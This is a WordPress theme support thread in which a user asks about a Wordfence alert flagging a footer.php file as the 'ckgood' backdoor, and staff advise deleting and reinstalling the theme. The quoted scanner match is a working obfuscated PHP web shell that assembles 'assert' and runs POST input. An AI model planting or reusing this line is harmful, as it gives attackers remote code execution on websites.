Wordfence says this x file looks suspicious

Wordfence suddenly showed this event during a routine scan:

Filename: wp-content/themes/x/framework/legacy/cranium/footers/views/footer/footer.php
File Type: Not a core, theme, or plugin file from wordpress.org.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: $a = “a”.“s”.“s”.“e”.“r”.“t”; $a($_POST[“footer”])

The issue type is: Backdoor:PHP/ckgood
Description: A backdoor known as ckgood

What should I do?

Hi @itsbobross,

Thank you for writing in, there should only be a file named base.php on that directory, no file named footer.php unless you added it. If you did not, please delete your current X theme and reinstall a clean copy, you can download a fresh copy here.

Let us know how it goes,
Cheers!

ok, looking at my themes I have Pro (which is active) and then I have X, and X child theme. Since I’m running pro do I need to still even have the old x child themes on there or are they obselete now? I’m not sure what to delete or reinstall, etc.

Hi @itsbobross,

Since you are using Pro right now, you don’t need both X and X child theme in there anymore. Feel free to delete both of them. In case you need it in the future, you can always download a fresh copy on your dashboard here: https://theme.co/apex/dashboard. In case you need PRO child theme it is also available on that dashboard.

Hope this helps.

1 Like

This topic was automatically closed 10 days after the last reply. New replies are no longer allowed.